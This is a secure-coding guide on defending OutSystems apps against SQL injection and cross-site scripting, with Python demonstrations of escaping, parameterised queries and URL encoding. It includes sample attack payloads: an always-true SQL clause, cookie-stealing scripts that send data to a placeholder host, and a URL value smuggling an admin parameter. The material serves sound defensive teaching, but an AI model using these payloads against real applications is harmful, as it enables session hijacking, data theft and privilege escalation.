
Protecting OutSystems apps from code injection / Cross Site Scripting attacks

Code Injection

Code injection happens when untrusted data is sent to an interpreter as part of a command or query, so that the interpreter parses the data as code instead of treating it as a value. Common scenarios include SQL Injection and XML Injection.

The following example from OWASP documentation illustrates how an SQL injection attack can be used to fetch all accounts from a database:
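The following is an added, runnable illustration of the same attack (my own example, not the OWASP one the page refers to). It uses an in-memory SQLite table with constructed sample rows: concatenating the untrusted value into the query text lets the classic `' OR '1'='1` payload return every account, while a bound parameter, or, where a value must be expanded inline, doubling single quotes (a minimal escaper written here for illustration, not the platform's EncodeSQL()), keeps the payload inside its string literal.

```python
import sqlite3

# Constructed sample data for this example (not from a real system).
ACCOUNTS = [
    (1, "alice", "acct-1001"),
    (2, "bob", "acct-1002"),
    (3, "carol", "acct-1003"),
]

# Classic payload: closes the string literal and appends an always-true clause.
ATTACK = "' OR '1'='1"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (id INTEGER, owner TEXT, number TEXT)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?, ?)", ACCOUNTS)
    return conn


def fetch_vulnerable(conn, owner):
    # Untrusted input is concatenated into the SQL text, so the database
    # parses it as part of the query rather than as a value.
    sql = "SELECT id, owner, number FROM accounts WHERE owner = '" + owner + "'"
    return conn.execute(sql).fetchall()


def fetch_parameterised(conn, owner):
    # Preferred fix: bind the value; the statement text never changes.
    sql = "SELECT id, owner, number FROM accounts WHERE owner = ?"
    return conn.execute(sql, (owner,)).fetchall()


def sql_encode(value):
    # Illustrative escaper for the case where a value must be expanded
    # inline: doubling single quotes keeps the input inside its literal.
    # This is a minimal version written for this example, not EncodeSQL().
    return value.replace("'", "''")


def fetch_escaped(conn, owner):
    sql = ("SELECT id, owner, number FROM accounts WHERE owner = '"
           + sql_encode(owner) + "'")
    return conn.execute(sql).fetchall()


def demo():
    # Row counts for each strategy against a normal value and the payload.
    conn = make_db()
    return {
        "vulnerable_normal": len(fetch_vulnerable(conn, "alice")),
        "vulnerable_attack": len(fetch_vulnerable(conn, ATTACK)),
        "parameterised_attack": len(fetch_parameterised(conn, ATTACK)),
        "escaped_attack": len(fetch_escaped(conn, ATTACK)),
    }


if __name__ == "__main__":
    print(demo())
```

Binding the parameter is the better fix because the value never enters the statement text at all; escaping is the fallback for the inline-expansion case and only works if every quoting character the interpreter recognises is handled.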

Cross Site Scripting

Cross Site Scripting (XSS) occurs when untrusted data is sent to a web browser (the renderer) without proper escaping, so the browser interprets it as markup or script instead of text. It is one of the most common web application vulnerabilities.

The following example from OWASP documentation illustrates how an XSS attack can be used to hijack a user session and impersonate that user:
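As an added illustration (my own example, not the OWASP one the page refers to), the code below renders a constructed user comment into a page template. The comment carries a script that would send the document's cookies to an attacker-controlled host (a hypothetical address). Inserting it unescaped produces a real script element; HTML-escaping it first turns the same bytes into inert text. Instead of matching substrings, the check parses the rendered page and looks at which elements actually exist, which is what matters to the browser.

```python
import html
from html.parser import HTMLParser

# Page template as a screen might emit it; {comment} is the untrusted slot.
PAGE = '<html><body><h1>Comments</h1><div class="comment">{comment}</div></body></html>'

# Constructed session-stealing payload; attacker.example is a placeholder host.
PAYLOAD = ('<script>new Image().src="https://attacker.example/?c="'
           '+document.cookie</script>')


def render_unescaped(comment):
    # Escaping turned off: the comment becomes part of the markup.
    return PAGE.format(comment=comment)


def render_escaped(comment):
    # Default, safe behaviour: <, >, &, " and ' become entities.
    return PAGE.format(comment=html.escape(comment, quote=True))


class TagCollector(HTMLParser):
    """Records every element start tag the parser sees."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def tags_in(document):
    parser = TagCollector()
    parser.feed(document)
    return parser.tags


def injects_script(document):
    # True if the untrusted content ended up as an executable element.
    return "script" in tags_in(document)


if __name__ == "__main__":
    print("unescaped:", injects_script(render_unescaped(PAYLOAD)))
    print("escaped:  ", injects_script(render_escaped(PAYLOAD)))
```

The escaped rendering still shows the attacker's text to other users, which is harmless; the point is that the browser never builds a script element from it.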

How to do it with OutSystems Platform

In general, the recommended strategy is to escape (encode) untrusted content before it reaches an interpreter, and OutSystems Platform does this by default for content in expressions.

When you explicitly turn off that default content escaping, encode the value yourself with the function that matches the context the value is inserted into:

Use case                                             Action
Escape expressions in screens                        Use EncodeHTML() when the value is rendered as HTML, or EncodeJavaScript() when it is placed inside a JavaScript string literal
Expand inline parameters in advanced queries         Use EncodeSQL() on every parameter that is expanded inline (prefer a regular, non-expanded parameter whenever the query allows it)
Manually build URLs in redirects with dynamic URLs   Use EncodeURL() on each dynamic value before concatenating it into the URL

The encoder must match the context: a value that is safe as HTML text is not automatically safe inside a script block, a SQL literal or a URL parameter, so the same value can need a different function in each place it is used.
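The following added example (my own code, not the platform's implementation of these functions) covers the two contexts from the table that are easy to get wrong: a value placed inside a JavaScript string literal and a value concatenated into a redirect URL. The JavaScript encoder is an approximation of an EncodeJavaScript-style function built from JSON string escaping plus \u escapes for the characters that could terminate the enclosing script element; the check that a practitioner can reuse is that the encoded text decodes back to the original value and contains neither a quote nor a closing tag. The URL part shows that an unencoded value lets an attacker append extra query parameters, while percent-encoding keeps the whole value inside the one parameter it was meant for. All payloads and the attacker.example host are constructed for this example.

```python
import json
from urllib.parse import parse_qs, quote, urlsplit

# Constructed attacker-controlled values.
JS_PAYLOAD = "x'; fetch('https://attacker.example/?c=' + document.cookie); //"
SCRIPT_CLOSE = "</script><script>alert(1)</script>"
URL_PAYLOAD = "shoes&IsAdmin=True#"


def encode_javascript(value):
    """Escape a value for use inside a JavaScript string literal.

    Approximation of an EncodeJavaScript-style function: JSON escaping
    handles backslash, double quote and control characters; single quote
    and angle brackets get \\u escapes so the output can sit inside either
    quote style and can never spell out </script>.
    """
    body = json.dumps(value)[1:-1]  # drop the surrounding double quotes
    return (body.replace("<", "\\u003c")
                .replace(">", "\\u003e")
                .replace("'", "\\u0027"))


def js_assignment(name, value):
    # Inline script line as a screen template would emit it.
    return "var " + name + " = '" + encode_javascript(value) + "';"


def js_literal_roundtrip(value):
    # The encoded body must be a valid string body that decodes to the input.
    return json.loads('"' + encode_javascript(value) + '"') == value


def url_encode(value):
    # Percent-encode with no characters treated as safe, so &, =, # and /
    # cannot change the structure of the URL they are inserted into.
    return quote(value, safe="")


def build_search_url_unsafe(term):
    return "/Search?q=" + term


def build_search_url(term):
    return "/Search?q=" + url_encode(term)


def query_params(url):
    # What the receiving screen would see after the browser follows the URL.
    return parse_qs(urlsplit(url).query, keep_blank_values=True)


if __name__ == "__main__":
    print(js_assignment("user", SCRIPT_CLOSE))
    print(query_params(build_search_url_unsafe(URL_PAYLOAD)))
    print(query_params(build_search_url(URL_PAYLOAD)))
```

Note that the JavaScript encoder only protects a value inside a string literal; it does not make a value safe to place directly in script code, and it does not replace HTML encoding for values rendered as markup.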

More information

To learn how to protect your OutSystems apps against other common types of attacks, check how OutSystems Platform helps you develop secure applications.